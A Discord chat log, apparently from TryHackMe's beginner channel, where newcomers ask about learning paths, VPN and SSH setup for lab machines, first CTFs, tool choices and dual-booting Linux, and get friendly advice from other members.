Please I'm new on here and I'm here to learn hacking

I'm new beginner and I want to know what to start now

what have you done already?

I think you could start with the PreSecurity Pathway. https://tryhackme.com/path/outline/presecurity

Hey, thanks for your answer!
I new for the manually crafted packets, as I coded a basic arp-spoofer before.
I was mostly curious about what/software does what in a normal working scenario.

So if we resume Application/Presentation are usually taken care of by the main program running,

Session, and transport layer would be taken care off by the OS

Network and datalink would be handled by the network card? (wireless or not?)

Then the router would take care of the physical layer?

Gave +1 Rep to @sand sonnet

Tryhackme does have some content on fundamentals that you could look at. In the presecurity path, there is "network fundamentals" and "how the web works" which may be relevant to you

You could also look at the room "Protocols and servers"

thx, I actually just did "network fundamentals", that"s why I posted

I'll check the other one!

I'm looking for a team to study together

What's going on guys

My friends and I are looking to participate in our first CTF
Do you have any suggestion regarding where to start and which one to begin with?

I remember picoCTF was quite accessible

Great, thank you

hi

finally im finished with this path

Great job! Well deserved 👏

thank you thank you

Gave +1 Rep to @drowsy cargo

wow i have to say it's really hard to get all the stuff after just learning once

The reason for that is because you can't possibly learn everything by just hearing about it once in a short summary. Sometimes it might seem like the room has a lot of info, but most of the time they are just summaries.

The whole topic of network layers can be discussed for hours and hours (hence why there is a great book about it I'd recommend named Computer Networks: A Top-Down Approach)

My best advice is do not try to learn everything after one time, most themes will be recurring. Take it a step of a time and don't be ashamed of going back to revise previous materials and always go make your own research, don't just read the room.

i'm really frustrated that i have learnt the whole network stuff in college, but when i relearn those things i still can't remember them well😭

moreover, it will still be exiting if i can get something new when i relearn, but it doesn't

i just repeat those easy stuff over and over, and still not get the really start of the whole pentesting or cyber security stuff

Perhaps focus on what helps you learn and your particular style.

Not everyone is same, so you should adapt the material to the way that best helps you.

if you want things to stick you need more practical things and also a huge help to memorise things or know where to look for the info later is to take personal notes

I also take notes and I agree it's a great tactic. I even used the notes from this path to refresh what I learned before an internview

Morning

I have a question

im currently learning linux OS and learning ssh

so in the linux on the browser I can enter to their server like this
tryhackme@10.10.62.118 and it works !!

but when i use this command on my VM kali linux machine it not work why ??

Are you connected to the TryHackMe VPN in your kali VM ?

oh

NO

can I ask why this is important?

oh wait don't tell me

I will search so I can find it by my own to improve my knowledge

Alright, then I suggest you search for Network Classes for example 🙂

OK

@soft snow I downloaded By sudo apt install openvpn but i can't find it in the downloads file?

I tried also to go to downloads file then install it again but with no use

openvpn should have been installed by default on kali

Regardless, if you install it, it's not in your downloads folder, it's just installed then.
So you can directly use it as a command

Check this room on how to connect to the THM vpn: https://tryhackme.com/room/openvpn

I have to locate the path tho

sudo openvpn /path/to/file.ovpn

i need the path

Right, did you check out the room on how to get your config file ?

ummmmmmmmmm

yeah sure i will

give me a minute

I need some stuff to my kali Like google chrome first 😂

@soft snow it worked, Thanks

Gave +1 Rep to @soft snow

Oh no. I had a 50 day streak but I totally forgot to answer some questions today. Back to 0. 😦

I'm at 85% of this learning path though. Hope to wrap it up soon.

#site-support message

You could kindly ask for a streak reset

I never have an easy or a good time due to the amount of trouble I run into every single time I try a course ! I am doing the “intro to offensive security” course rn. I am on the terminal and I cannot get gobuster running. It says (Unable to locate package gobuster) shouldn’t (tryhackme) have it pre installed or do I really have to install it on my computer?

Never mind I found my problem

After i complete one component of this path am i required to be a paid subscriber to continue ?

yes, around half the rooms are subscriber only in paths

Oh true.......

How about boxes ?

80% free

Nice......

There is plenty of free boxes.

You can go to Learn > Search and filter out free boxes.

Nice.........

I do suggest the sub though, it's cheaper than a yearly sub of Netflix.

and you learn.

Win/win.

I’ve been doing tryhackme but whenever i’m on the discord people are bringing up things that i have yet to hear about. When do i start using the terminal and learning about different commands and using them? is that in the junior pen pathway, and if so, should i start it after i finish this one?

I assume you are not that long here already. So obviously there is a lot you never heard about.
My suggestion, do #pre-security-legacy-path + #974406074444685322 then #junior-pentester-path you will be using the terminal soon enough 🙂

ok, thankyou!! @soft snow

Suuuupp

a tough week

how to be less anxious

kill me

Anyone from netherlands here? Pm me

Why?

I am 🙂

Hey I have a question, after completing pre-security and intro-to-cyber-security, should one go for Complete beginner path or jr. Pentester path? Please let me know about this

If you want shadows recommendations it is in this order
#pre-security-legacy-path
#974406074444685322
#junior-pentester-path
#pentest-plus-path
#web-fundamentals-path
#offensive-pentesting-path
#791764435991658556
complete beginner is outdated and marked for removal later or being fully updated but that is taking its sweet time

Okay thank you so much @trail flame @potent wedge .

Gave +1 Rep to @trail flame

no problem

Gave +1 Rep to @potent wedge

YAY rep points for shadow thanks to lassi

Good Evening All! I'm new to the THM community and currently working on the pre-security path.

My questions is during linux essentials 1 it is mentioned to check out the find command THM room. However I believe this room was made private. Is there anyway to access it?

some rooms are ViP and you need to be Subscribed to access

I do have a subscription. When I went to find the room it says it was private.

It says the owner has made the room private. So I’m assuming it won’t be available anymore?

can you provide link

take screenshot of that private area to check it

Your banner

yes. cronic insomnia is kinda bad so ig toes with that banner

if you're being serious then you should try some yoga. It's probably because you're pushing yourself too much.

im not doing it by my self. is brain dysfunction and so on. i try lots of "natural" stuff.

gobuster vs ffuf, which one shall I learn in depth? Which one is better?

alright, thank you.

I have a very specific question, I have a half year experience with ubuntu and by now I've completed bash scripting too. I want to dual boot my system with a linux distro but I'm confused . You see I want to be a system administrator and a penetration tester both, so considering both together , which distro shall I choose ?if somebody happens to have a suggestion then please let me.

They say fedora , centos both are good for system administrators and parrot os and Kali is good for Penetration tester but I have to choose one, so which one shall I go with?

There's one linux room which shows that too, I can't remember which one but there is one. It simply means the person who created room has removed it from public rooms. and yeah it won't be available anymore to anyone but the owner of the room.

parrot os and kali are made for specific purposes, so wouldn't recommend dual-booting with them, something stable like ubuntu should be a good alternative as you can pretty much get everything kali on there,
disclaimer: I've got a dual-booted kali for two years now(which has crashed sometimes)

there's also a ton of more stuff that dual-booting offers imo, the people who're so much against it, havn't used it for more than a month to feel it's perks afaik

what made you dislike linux from dual-booting, it just amplifies the stuff I like about linux

gaming and some specific software(adobe, matlab) aside, I'd switch over completely

yeh, I don't use my windows a lot, but if you have to switch more, staying on windows can be easier

yeh, that happened with me too, I think, random grub rescue terminal and boot order messing up but it's all part of the experience

Okay then I've decided to switch entirely to ubuntu and put my windows license on vm (I want to keep my windows too). I'll do that in august, my college happens to have 3 consecutive holidays in that month, so that is when I'll do it. Thank you @trail flame @small spire

Gave +1 Rep to @trail flame

Gave +1 Rep to @small spire

yes OneNote and MS office

the enetire ms office suite I mean

making a windows vm is a pain on your resources, it needs 60 GB storage at least, and is generally a pain to work with for bigger projects imo

Oh no that's not good.

what if I give 120 GB of storage, 6 GB RAM and 2 cores and 124MB VRAM?

will it be enough for a windows 10 on vm?

👀

if you have that, yeh, that'll work

Okay then thank you.

is anyone getting a ssh connection time out error?

I'm logged into the THM server, says im connected, but i cant connect to the machine via ssh

port 22: Connection timed out

I've never had any issues in the past (new member here. only been at it for a week or so)

the nmap room

no one did. I just like to get the reps in to practice different nmap comands 🙂

thank you for the response Iassi

hello everyone this gonna sound lame but i am looking for a mentor, if someone is interested in helping me i would appreciate and be very grateful

i think you will have more success in finding a team appropriate with your level and learn along with them instead of actually finding a "mentor", my opinion at least

I suggest trying #964299701581119538

@last schooner thank you

Gave +1 Rep to @last schooner

ahh no worries mate 🙂

@last schooner i cant find that channel in text only voice

could you help ,me

#964299701581119538 this is the text channel

You can click on this one that i posted here and it will redirect you there

i click but do nothing

Hmm maybe it's because you are not verified

!docs verify

Follow the instructions in the link above to verify with the discord bot

and try after to click on that channel that i posted

ok

thank you

no worries